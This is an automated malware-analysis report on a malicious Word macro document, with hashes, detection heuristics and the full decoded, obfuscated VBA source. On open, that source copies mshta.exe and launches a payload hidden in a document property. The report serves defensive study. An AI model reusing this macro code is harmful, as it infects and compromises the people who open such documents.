Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0cf18dc6d8cd11dc…

MALICIOUS

Office (OOXML)

100.4 KB Created: 2020-11-18 20:26:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-23
MD5: f96d0e085a0648335a844e1cdd31ed6f SHA-1: 3a2c533d5ba0b9ddb3d38912ba2118569f8ccd35 SHA-256: 0cf18dc6d8cd11dca29694ea98c204321d8d662d3ffefc01f2a96c63f6d1bc53
138 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Call CreateObject("ws" + aN6Dch + "ell").run(aDnOY)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    a8Vdg = Environ(aINnkh)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10489 bytes
SHA-256: 17504fa1151c1baa4afac567190893866fbe64f6f66b991fa6cac2deb0a5df26
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "axBLuD"
Sub AutoOpen()
' Retrace accountable slime
' Cheese mediate lice
' Se determines fudge hampton
' Bristling over amp
' Pipes parsonage spot disagreement
' Payment pervert whove feasible
' Isolated pantheon
' Mainstream intermittent encyclopedia
' Oddity accumulates captivate hurling
' Ungainly autem virgin
' Cession uncultivated
aWJPFB
End Sub

Attribute VB_Name = "aeTqcS"
Public Const a8WFp As String = ""
Public Const alt40 As Integer = 293 - 280
Public Const a61Cnv As String = "1ridn1iw1"
Public Const akzHB As String = "231met1sys1"
Public Const aZutCY As String = "p1m1e1t"
Public Const aN6Dch As String = "cript.sh"
Function adK0Ve()
' Enact hu worked tang baltimore
' Andale soot serpentine criminal lobe
' Bacon record
' Voicing norwegian identity xbox defunct
' Inviolable egotism reciprocate
' Armature passed florida
' Compiler displayed absolution checkered being
' Ballast catacombs mythological
' Supported dana uruguay alleviate
' Abbreviations adder
' Mario passageway grannie
End Function
Sub asOfhu(aadYV3)
' Portray desk layout loot
' Provincial elseif indicating smack
' Sending liquid assassins ada
' Overwhelm giraffe webster keel
' Metre aol nightingale nb
' Cnet integrating fran portentous
' Gnu mail hexameter crease humanity
' Citizenship penniless vascular
' Minerva en public freeze
' Turns chemicals refutation
' Curve pecking niggard works arising blond
' Hd calculated omnipotence possibilities larvae bray kay
' Farms capitol promise oratorical chilling
' Freehold incipient computing
' Stayed morass
' Ark. bristol prays sussex these cents
' Terrifying siena beginning congo soundtrack
' Component typhus impetus capitol
' Absolutely commitment terminology
' Sprightly
' Reasons transcript
' None improvements resume rhapsody cork alder
' Mind managed savage rankings
' Clocks terror
' Mongolian intrusive clinical pulsation
' Exact richards adelaide
' Bloodshot ointment
' Eradicate amanda baltimore closeted unco walls
' Clover swagger token comma pd
' Ventral nitrogen one-sided
' Decade desk public
' Tub cut sd thimble modification reserves y
' Epirus syrup jer. chick
' Windpipe kerry sacerdotal ourselves bestowal
' Gape consultation
' Stubbornly bacteria astrologer
' Cuirass disquisition transgression worry
' Vermin org undeveloped drives lottery
' Engineering consulate antibody ci high-pitched pillage prefer
' Vascular significant
' Spectacular fervour husband
' Hiring winsome coax unproductive armenia mammon
' Bacterial
' Rhapsody forge manufacture
' Padua representations atrocity
' Froth
' Teacup
End Sub
Function a137av(aTOuxa)
a137av = ActiveDocument.BuiltInDocumentProperties(aTOuxa)
End Function
Public Sub aCI4wU()
a4nQD
End Sub
Public Sub aQjunc()
' Likelihood africa popish noontide
' Swingers ii bleached sept coupon
' Hollywood tires bed cobweb controls lexicon winning
' Tion
' Malleable nearly therapy
' Prediction dairy
' Ducal phd laboratories
' Air
' Cancel const updating peppermint
' Gary modeling
' Briefing impertinence liability marketplace
aNQo3k
End Sub

Attribute VB_Name = "ahgEL"
Public Function aY2RNu(am6Twu, a9bHsy)
' Aircraft kangaroo dormitory leant burning
' Collation cruiser bob autograph propecia quiz nativity
' Petersburg abelard ata
' Lunar liberal gbp buddy chary
' Spa manually leave-taking formality postman
' Marijuana percent northern
' Food pump gratuity
' Crap niger volume milfhunter ion south
' Confidential oratorio
' Crags innovative blind fetish uc bite
' Yugoslavia insular
' October olfactory decor gloucestershire juniper
' Pct unification wr rrp significantly
' Reproductive frieze assistance
' Customers thread
' Detection euphrates leant
' Ordain skip wheel partial telephony
' Pusillanimous whiles prologue tuner
' Semi swing charts flaunt
' Cold haired screenshots regulatory equilibrium wanted
' Aide
' Waters voyeurweb charger
' Performance unto falsify ak canning priest
' Doll toilet all-embracing mf
' Surmise implementing queue bivouac oughtnt inquiry
' Ferry hughes lukewarm
' 12mo transgress ways
' Pussy fbi
' Pickled hip
' Swineherd ea
' Saw momentum celebs
' Porridge
' Homeless epidemic
' Iso lessons consoles buckle lifelike
' Vial euripides
FileNumber = FreeFile
Open am6Twu For Output As #FileNumber
' Need scott kinship
' Blink favor
' Fred
' Nashville relentlessly
' Textbook currently wood
' Screech leafy
' Individuals affect fuse unfounded
' Davidson
' Changing whet downtown periodically
' Threatening sewed
' Snipe lycos
Print #FileNumber, a9bHsy
Close #FileNumber
End Function
Sub ai1FxW(a3kVR, aTdYjg)
' Wills replica welch candelabra handicraft hughes
' Rogers specialist normans baggy unconcern
' Balustrade
' Readers roseate withers
' Dylan
' Accepts mulatto bret decrease frees
' Rubble voters pest
' Participated unopened ferrara highland
' Tapes hr mulberry parents lifelike
' Advisor
' Monitor thrush synthetic cheats
' Frisky enigma
' Chronicle regulation bali
' Turnkey scroll
' Gang alaric chancellor brilliant
' Guestbook life-size
' Faced instructors
' Emergency harbour arid dev
' Resistant sot might composed
' Lightweight vegetables railway businesslike mirrors token
' Lumbering gp
' Salvation agonized manger donors
' Exhibits slit realist agricultural
' Crayon begrudge epic
' Co-operative subjugate
FileCopy a3kVR, aTdYjg
End Sub
Function agQk0(anJm0)
agQk0 = anJm0
End Function
Function aWxDq(anJm0) As String
Dim aFNpnP As Long
Dim a41Da As Integer
Dim acODG As Integer
For aFNpnP = 1 To Len(anJm0)
' Bulb ably
' Undefined cc
' Unattended propagate mess
' Architects magically regulation usable expence
' Self-evident adopt mirror
' Moderator affecting
' Belkin stream rice
' Fair saskatchewan
' Stacy swineherd spat
' Olympus visit nazareth
acODG = 0
aZ64u = Mid(anJm0, aFNpnP, 1)
a41Da = Asc(aZ64u)
If (a41Da > akNpz(32468 - 32467) And a41Da < akNpz(4947 - 4945)) Or (a41Da > akNpz(7641 - 7638) And a41Da < akNpz(26816 / 6704)) Then
acODG = alt40
' Elevation lees
a41Da = aNdq0H(a41Da, acODG)
' Filled monotone transmutation brusque warrant
If a41Da < akNpz(5) And a41Da > 83 Then
a41Da = acZYEa(a41Da)
ElseIf a41Da < 14755 / 227 Then
a41Da = acZYEa(a41Da)
End If
End If
' Forgotten amassed guitar yard
ab8eWz = aBZIx(a41Da)
Mid$(anJm0, aFNpnP, 1) = agQk0(ab8eWz)
Next aFNpnP
aWxDq = anJm0
End Function

Attribute VB_Name = "auvlR6"
Function aw6BS3(aC1Ls)
abNaA = aC1Ls
a9DeW2 = Len(abNaA)
For aJf41 = 0 To a9DeW2 - 1
aHwBet = aHwBet & Mid(abNaA, (a9DeW2 - aJf41), 1)
Next aJf41
aw6BS3 = aHwBet
End Function
Public Function aW7Ne(aCUQKv)
aW7Ne = Replace(aCUQKv, a8WFp, "")
' Please
' Consist chastity guardian effect
' Repeat wane arc easier egotism
' Cuisine birthplace dell
' Recipients
' Manufactured carrying lyre abstractedly
' Remoteness
' Smell economies
' Abdication woodwork stand layman
' Excellent ariel
End Function
Sub aWJPFB()
' Junk becomes ugliness chisel za
aCI4wU
aQjunc
' Ambiguous bookish unbending concierge
' Elections religion save nutrition
' Halves appraisal uterus melbourne
' Associates amazon
' Avoiding mods knitting
' Mandolin hoarding melodious
' Specification ware
' Deadly spoor
' York drop atlas
' Travesti
' Tyrone oceans flakes restorer
' Dweller consolidation
Call CreateObject("ws" + aN6Dch + "ell").run(aDnOY)
End Sub

Attribute VB_Name = "arYJVh"
Function a8Vdg(aINnkh)
a8Vdg = Environ(aINnkh)
End Function
Function ajN37T()
With Application
ajN37T = .PathSeparator
End With
End Function
Function aVBbg(aYmIng)
aDGmA3 = VBA.Split(aw6BS3("lmth.ni|moc.ni|exe.athsm"), "|")
' Hog incest
' Abridged bridget lite
' Box integral asin solving
' Tawdry equivalent
' Spurn original excel gravity wanted vineyard
' Shortening aromatic palestinian splinter
' Buys comparisons benefice onset trends
' Fernando ostensible
' Inside quaking blues
' Mauritius buyer correlation prizes
' Mach holly tumultuously bulbous affair
' Ebay com- subsides harangue
' Londoner
' Pk
' Dispatched focus refinance
Select Case aYmIng
Case 0:
' Bryant turner
aVBbg = a8Vdg(Replace(aw6BS3(a61Cnv), "1", "")) & ajN37T & Replace(aw6BS3(akzHB), "1", "") & ajN37T & aDGmA3(0)
' Botany
' Alabama phalanx seller
' Grieves pace bikes
' Folklore apache bodice gays
' Loans curative seek
' Span seventy-three
' Ps. ages min cockade jeopardy
' Sportsman qualities announcements ratio bonfire
' Fake pda knight room
' Fear fibre
' Fiction sept curious
' Ag insides case carey annex labor combination
Case 1:
aVBbg = a8Vdg(Replace(aw6BS3(aZutCY), "1", "")) & ajN37T & aDGmA3(1)
' Veined verification recede mar inexpensive
' Touring gauge
' Boulevard standard scenario
' Overbearing
' Leave-taking ranking illness
' Glue
' Arkansas collectors
' Smith jewelry grimace
' Widespread frequently
' Fisting
' Studio global
Case 2:
aVBbg = a8Vdg(Replace(aw6BS3(aZutCY), "1", "")) & ajN37T & aDGmA3(2)
End Select
End Function
Sub aNQo3k()
aNP1y = adflNG(aVBbg(2))
aY2RNu aNP1y, aWxDq(a137av("category"))
End Sub

Attribute VB_Name = "agCvA"
Function aS8xz(aEhtb)
aS8xz = (aW7Ne(aEhtb))
End Function
Function aNCrbw(aav7nk)
aNCrbw = (aW7Ne(aav7nk))
End Function
Function adflNG(ayPvn)
adflNG = (aW7Ne(ayPvn))
End Function
Function aDnOY()
aiyIv5 = aNCrbw(aVBbg(1))
aJqp2 = adflNG(aVBbg(2))
aDnOY = aiyIv5 & " " & aJqp2
End Function

Attribute VB_Name = "a8WXbP"
Sub a4nQD()
aEYANf = aS8xz(aVBbg(0))
afjRD = aNCrbw(aVBbg(1))
ai1FxW aEYANf, afjRD
End Sub
Function acZYEa(aaGAI)
acZYEa = aaGAI + 9776 / 376
End Function
Function akNpz(amKVCB)
If amKVCB = 0 Then
akNpz = 8025 / 8025
ElseIf amKVCB = 1 Then
akNpz = 524 - 460
ElseIf amKVCB = 2 Then
akNpz = -33 + 124
ElseIf amKVCB = 3 Then
akNpz = 26496 / 276
ElseIf amKVCB = 4 Then
akNpz = 45 + 78
ElseIf amKVCB = 5 Then
akNpz = 11349 / 117
Else
akNpz = 996 + 28
End If
End Function
Function aNdq0H(aaGAI, aNZhCQ)
aNdq0H = aaGAI - aNZhCQ
End Function
Function aBZIx(aaGAI)
aBZIx = VBA.ChrW(aaGAI)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 46592 bytes
SHA-256: 405ba01918a03888f7d6fc79813815b4be98db0963b827143d74f743b4a31c3a

Open this report in the interactive analyzer, or submit your own file for analysis.